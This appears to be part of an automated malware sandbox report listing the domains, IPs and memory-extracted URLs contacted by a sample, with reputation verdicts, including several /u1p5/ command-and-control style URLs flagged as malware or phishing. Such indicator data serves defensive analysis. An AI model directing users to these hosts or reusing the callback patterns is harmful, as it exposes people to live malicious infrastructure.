          http://www.hornnbach.com/u1p5/www.piertrafesa.com0%Avira URL Cloudsafe
          http://www.dasmonica.com/u1p5/www.freeclothesonline.com0%Avira URL Cloudsafe
          http://www.marymarinho.com/u1p5/?y4Mp=jmW97e0DcxHZsiDt+DmiFhziWrO1jPfkTbEIn6OHXnuLtYKLIrDwNEu/EQYt2xDuBHghXZP9DQ==&D0GHx=5jNT0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.piertrafesa.com/u1p5/0%Avira URL Cloudsafe
          http://www.jovam.xyz/u1p5/www.hokabrazil.com100%Avira URL Cloudphishing
          http://www.jovam.xyz0%Avira URL Cloudsafe
          http://www.apeutah.comReferer:0%Avira URL Cloudsafe
          http://www.pbcgotv.comReferer:0%Avira URL Cloudsafe
          http://www.kailibianminwang.com0%Avira URL Cloudsafe
          http://www.vzn2aai2qj.icuReferer:0%Avira URL Cloudsafe
          http://www.vinewineltd.com/u1p5/www.pbcgotv.com100%Avira URL Cloudmalware
          http://www.dasmonica.com/u1p5/0%Avira URL Cloudsafe
          http://www.vzn2aai2qj.icu/u1p5/www.deutscheno1.com0%Avira URL Cloudsafe
          http://www.agengrosirfashion.com/u1p5/100%Avira URL Cloudmalware
          http://www.freeclothesonline.comReferer:0%Avira URL Cloudsafe
          http://www.hokabrazil.comReferer:0%Avira URL Cloudsafe
          http://www.jovam.xyz/u1p5/100%Avira URL Cloudphishing
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.jovam.xyzReferer:0%Avira URL Cloudsafe
          http://www.verifyaxcx.com0%Avira URL Cloudsafe
          http://www.deutscheno1.com/u1p5/0%Avira URL Cloudsafe
          http://www.pbcgotv.com0%Avira URL Cloudsafe
          http://www.piertrafesa.comReferer:0%Avira URL Cloudsafe
          http://www.yannickrast.comReferer:0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.dasmonica.com0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.kailibianminwang.com/u1p5/100%Avira URL Cloudmalware
          http://www.typography.netD0%URL Reputationsafe
          http://www.agengrosirfashion.com/u1p5/www.dasmonica.com100%Avira URL Cloudmalware
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.agengrosirfashion.comReferer:0%Avira URL Cloudsafe
          http://www.apeutah.com/u1p5/100%Avira URL Cloudmalware
          http://www.hokabrazil.com/u1p5/100%Avira URL Cloudphishing
          http://www.freeclothesonline.com0%Avira URL Cloudsafe
          http://www.vinewineltd.comReferer:0%Avira URL Cloudsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.rhoads-music.com/u1p5/www.verifyaxcx.com0%Avira URL Cloudsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.hokabrazil.com100%Avira URL Cloudphishing
          http://www.yannickrast.com0%Avira URL Cloudsafe
          http://www.agengrosirfashion.com0%Avira URL Cloudsafe
          http://www.vinewineltd.com/u1p5/100%Avira URL Cloudmalware
          http://www.fontbureau.comF0%URL Reputationsafe
          http://www.bettingweb365.com/u1p5/?y4Mp=UXBCCV9Hg7LlUlEhFgBZZuvhtrkgDnenbWAOO9JvD+HvWaQ2ttROIxFaz7G4unDmw6qRWL3K2g==&D0GHx=5jNT0%Avira URL Cloudsafe
          http://www.verifyaxcx.com/u1p5/0%Avira URL Cloudsafe
          http://www.vzn2aai2qj.icu0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.hornnbach.com/u1p5/0%Avira URL Cloudsafe
          http://www.deutscheno1.com/u1p5/www.yannickrast.com0%Avira URL Cloudsafe
          http://www.fontbureau.comm0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.kailibianminwang.com/u1p5/.100%Avira URL Cloudmalware
          http://www.hornnbach.com0%Avira URL Cloudsafe
          http://www.vzn2aai2qj.icu/u1p5/0%Avira URL Cloudsafe
          http://www.deutscheno1.com0%Avira URL Cloudsafe
          http://www.shitcoin.team/u1p5/?y4Mp=vL5j7Eq3si3+pqkwq9GVQc9zWaxA/P/bTusMaerk9f3EW+lc0CCc1NhXRSl0Kt4KYFMx8zSAYw==&D0GHx=5jNT0%Avira URL Cloudsafe
          http://www.rhoads-music.com/u1p5/0%Avira URL Cloudsafe
          http://crl.v0%URL Reputationsafe
          http://www.deutscheno1.comReferer:0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          bettingweb365.com
          		92.222.235.170
          		truefalse
            		high
            www.deutscheno1.com
            		34.149.59.90
            		truefalse
              		high
              marymarinho.com
              		192.0.78.24
              		truefalse
                		high
                shitcoin.team
                		107.180.34.104
                		truefalse
                  		high
                  www.shitcoin.team
                  		unknown
                  		unknownfalse
                    		high
                    www.bettingweb365.com
                    		unknown
                    		unknownfalse
                      		high
                      www.vzn2aai2qj.icu
                      		unknown
                      		unknownfalse
                        		high
                        www.marymarinho.com
                        		unknown
                        		unknownfalse
                          		high

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://www.marymarinho.com/u1p5/?y4Mp=jmW97e0DcxHZsiDt+DmiFhziWrO1jPfkTbEIn6OHXnuLtYKLIrDwNEu/EQYt2xDuBHghXZP9DQ==&D0GHx=5jNTtrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.bettingweb365.com/u1p5/?y4Mp=UXBCCV9Hg7LlUlEhFgBZZuvhtrkgDnenbWAOO9JvD+HvWaQ2ttROIxFaz7G4unDmw6qRWL3K2g==&D0GHx=5jNTtrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.shitcoin.team/u1p5/?y4Mp=vL5j7Eq3si3+pqkwq9GVQc9zWaxA/P/bTusMaerk9f3EW+lc0CCc1NhXRSl0Kt4KYFMx8zSAYw==&D0GHx=5jNTtrue
                          • Avira URL Cloud: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://www.vinewineltd.comexplorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.hornnbach.comReferer:explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.verifyaxcx.com/u1p5/www.agengrosirfashion.comexplorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.freeclothesonline.com/u1p5/explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmptrue
                          • 1%, Virustotal, Browse
                          • Avira URL Cloud: malware
                          		unknown
                          http://www.fontbureau.com/designersH4vBtZsi8xAKaMm.exe, 00000001.00000002.344172860.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.piertrafesa.com/u1p5/www.vinewineltd.comexplorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.freeclothesonline.com/u1p5/www.apeutah.comexplorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://www.sajatypeworks.comH4vBtZsi8xAKaMm.exe, 00000001.00000002.344172860.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.founder.com.cn/cn/cTheH4vBtZsi8xAKaMm.exe, 00000001.00000002.344172860.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.rhoads-music.comReferer:explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.kailibianminwang.comReferer:explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.pbcgotv.com/u1p5/explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://www.piertrafesa.comexplorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.yannickrast.com/u1p5/www.rhoads-music.comexplorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.galapagosdesign.com/DPleaseH4vBtZsi8xAKaMm.exe, 00000001.00000002.344172860.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.rhoads-music.comexplorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.urwpp.deDPleaseH4vBtZsi8xAKaMm.exe, 00000001.00000002.344172860.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.apeutah.com/u1p5/www.jovam.xyzexplorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://www.zhongyicts.com.cnH4vBtZsi8xAKaMm.exe, 00000001.00000002.344172860.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameH4vBtZsi8xAKaMm.exe, 00000001.00000002.340630386.00000000032D1000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://bettingweb365.com/u1p5/?y4Mp=UXBCCV9Hg7LlUlEhFgBZZuvhtrkgDnenbWAOO9JvDrundll32.exe, 00000013.00000002.801147155.000000000541F000.00000004.10000000.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.yannickrast.com/u1p5/explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.autoitscript.com/autoit3/Jexplorer.exe, 0000000F.00000000.363498621.0000000006840000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.434119185.0000000006840000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.348701953.0000000006840000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.382832125.0000000006840000.00000004.00000001.00020000.00000000.sdmpfalse
                                		high
                                http://www.pbcgotv.com/u1p5/www.kailibianminwang.comexplorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.verifyaxcx.comReferer:explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.apeutah.comexplorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.dasmonica.comReferer:explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.hokabrazil.com/u1p5/www.hornnbach.comexplorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: phishing
                                		unknown
                                http://www.hornnbach.com/u1p5/www.piertrafesa.comexplorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.dasmonica.com/u1p5/www.freeclothesonline.comexplorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.carterandcone.comlH4vBtZsi8xAKaMm.exe, 00000001.00000002.344172860.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.piertrafesa.com/u1p5/explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.jovam.xyz/u1p5/www.hokabrazil.comexplorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: phishing
                                		unknown
                                http://www.jovam.xyzexplorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.fontbureau.com/designers/frere-jones.htmlH4vBtZsi8xAKaMm.exe, 00000001.00000002.344172860.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.apeutah.comReferer:explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.pbcgotv.comReferer:explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.kailibianminwang.comexplorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.vzn2aai2qj.icuReferer:explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.vinewineltd.com/u1p5/www.pbcgotv.comexplorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://www.dasmonica.com/u1p5/explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.vzn2aai2qj.icu/u1p5/www.deutscheno1.comexplorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.agengrosirfashion.com/u1p5/explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://www.freeclothesonline.comReferer:explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.hokabrazil.comReferer:explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.jovam.xyz/u1p5/explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: phishing
                                  		unknown
